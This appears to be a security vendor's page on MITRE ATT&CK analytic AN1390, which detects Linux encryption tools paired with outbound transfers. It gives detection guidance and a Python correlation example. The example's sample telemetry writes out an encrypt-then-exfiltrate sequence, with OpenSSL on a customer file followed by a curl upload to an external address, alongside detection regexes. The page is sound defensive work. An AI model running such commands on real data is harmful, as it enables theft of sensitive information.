MITRE ATT&CK® Analytic

AN1390: Analytic 1390

Detects command-line utilities or scripts using encryption libraries or symmetric algorithms (e.g., OpenSSL AES, GPG, Python + PyCrypto) in conjunction with outbound file transfers or traffic to external destinations.

Enterprise | AN1390 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN1390 is a Linux-focused detection analytic for situations where command-line tools or scripts use encryption capabilities, such as OpenSSL, GPG, or Python crypto libraries, together with outbound file transfer or traffic to external destinations. For leaders, the value is not that encryption is suspicious by itself; it is that encryption plus external movement can be a material signal that sensitive data is being packaged, protected from inspection, or moved outside normal channels.

Executive priority

Prioritize this analytic where Linux systems handle sensitive data, regulated records, business-critical files, or operational workloads. The business question is whether the organization can show evidence of who encrypted data, what left the environment, and whether the destination was expected. This supports incident triage, compliance evidence, and control validation around egress monitoring, Linux logging, and approved data transfer paths.

Technical view

SOC and detection teams should validate visibility into Linux process execution and command-line arguments for encryption utilities and script interpreters, then correlate that activity with outbound file transfer or external network connections. Because tactics and relationship context are not supplied, treat this as a behavior-level analytic rather than a technique-specific rule. Tuning should distinguish approved administrative, backup, development, and data exchange workflows from unusual combinations of encryption commands, scripting runtimes, and external destinations.

Likely telemetry

  • Linux process execution events with command-line arguments
  • Shell history or terminal session telemetry where available
  • Script interpreter activity, especially Python invoking crypto-related libraries
  • File transfer logs from tools or services used for outbound movement
  • Network connection, flow, proxy, firewall, or DNS telemetry showing external destinations

Detection direction

  • Correlate encryption-related command-line or script activity with outbound connections or file transfers within a defensible time window.
  • Baseline legitimate Linux encryption and transfer workflows, such as backups, automation, software release processes, and administrator file handling.
  • Tune for external destinations that are unusual for the host, user, service account, or workload.
  • Preserve command-line, parent process, user, host, destination, and timing context for incident response review.
  • Account for blind spots where command-line logging, script telemetry, or egress visibility is incomplete.
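A minimal version of the correlation described above, as an added example (not part of the MITRE analytic or Glexia's page): it pairs encryption command lines with later outbound connections by the same host and user inside a time window, and treats RFC 1918, loopback and link-local ranges as internal so that an internal backup path does not alert. All telemetry below is constructed, and the internal-range list is an assumption to be replaced with the organisation's own.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): Linux process events and
# outbound connection events, each keyed by host and user with a timestamp.
PROC_EVENTS = [
    {"ts": "2024-05-01T10:00:05", "host": "web01", "user": "deploy",
     "cmd": "openssl enc -aes-256-cbc -salt -in customers.csv -out customers.enc -pass env:K"},
    {"ts": "2024-05-01T10:01:10", "host": "web01", "user": "deploy",
     "cmd": "curl -T customers.enc https://203.0.113.10/upload"},
    {"ts": "2024-05-01T11:00:00", "host": "db01", "user": "backup",
     "cmd": "gpg --symmetric --cipher-algo AES256 nightly.tar"},
    {"ts": "2024-05-01T11:00:30", "host": "db01", "user": "backup",
     "cmd": "rsync -av nightly.tar.gpg 10.0.0.5:/backups/"},
]
NET_EVENTS = [
    {"ts": "2024-05-01T10:01:11", "host": "web01", "user": "deploy", "dst": "203.0.113.10"},
    {"ts": "2024-05-01T11:00:31", "host": "db01", "user": "backup", "dst": "10.0.0.5"},
]

# Encryption indicators named by AN1390: OpenSSL symmetric ciphers, GPG in
# symmetric mode, and Python invoking PyCrypto/PyCryptodome-style modules.
ENC_PATTERNS = [
    re.compile(r"\bopenssl\s+enc\b"),
    re.compile(r"\bgpg\b.*(?:-c\b|--symmetric)"),
    re.compile(r"\bpython[23]?\b.*\b(?:Crypto|Cryptodome|cryptography)\b"),
]
# Assumed internal ranges; a real deployment uses its own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
WINDOW = timedelta(minutes=5)

def is_external(ip: str) -> bool:
    """True when the destination is outside the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def correlate(proc_events, net_events, window=WINDOW):
    """Pair each encryption command with a later external connection by the same host/user."""
    alerts = []
    for p in proc_events:
        if not any(pat.search(p["cmd"]) for pat in ENC_PATTERNS):
            continue
        t0 = datetime.fromisoformat(p["ts"])
        for n in net_events:
            t1 = datetime.fromisoformat(n["ts"])
            same_actor = (n["host"], n["user"]) == (p["host"], p["user"])
            if same_actor and t0 <= t1 <= t0 + window and is_external(n["dst"]):
                alerts.append({"host": p["host"], "user": p["user"], "enc_cmd": p["cmd"],
                               "dst": n["dst"], "delta_s": int((t1 - t0).total_seconds())})
    return alerts
```

On the constructed data only the web01 sequence alerts; the db01 GPG-then-rsync pair is suppressed because its destination is internal, which is the baselining the list above calls for.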

Mitigation priorities

  • Ensure Linux endpoint and server logging captures process execution and command-line detail where appropriate.
  • Centralize egress telemetry from firewalls, proxies, DNS, and network flow sources for systems that can transfer files externally.
  • Define and document approved outbound file transfer methods and destinations for sensitive Linux workloads.
  • Use access controls and network egress restrictions to reduce unauthorized external transfer paths.
  • Retain sufficient telemetry to support post-incident reconstruction of encrypted file creation and outbound movement.

Analyst notes and limits

This object is a detection analytic, not a full ATT&CK technique entry. The supplied fields identify Linux as the platform and describe detection intent, but no official detection logic, ATT&CK tactics, aliases, labels, or relationship context were provided. The analytic should therefore be implemented as a correlation concept and validated against local Linux workloads and approved data movement patterns.

Coverage cannot be assumed from the ATT&CK object alone. Effectiveness depends on local logging for Linux process execution, command-line capture, script activity, file transfer evidence, and outbound network visibility. The supplied data does not support claims about active exploitation, attribution, specific malware, impact, or guaranteed detection.

Official MITRE ATT&CK definition

Analytic 1390

Detects command-line utilities or scripts using encryption libraries or symmetric algorithms (e.g., OpenSSL AES, GPG, Python + PyCrypto) in conjunction with outbound file transfers or traffic to external destinations.


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: e1c2d16fd43325f2...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 1.0 | | Current bundle | e1c2d16fd433…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack: AN1390

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.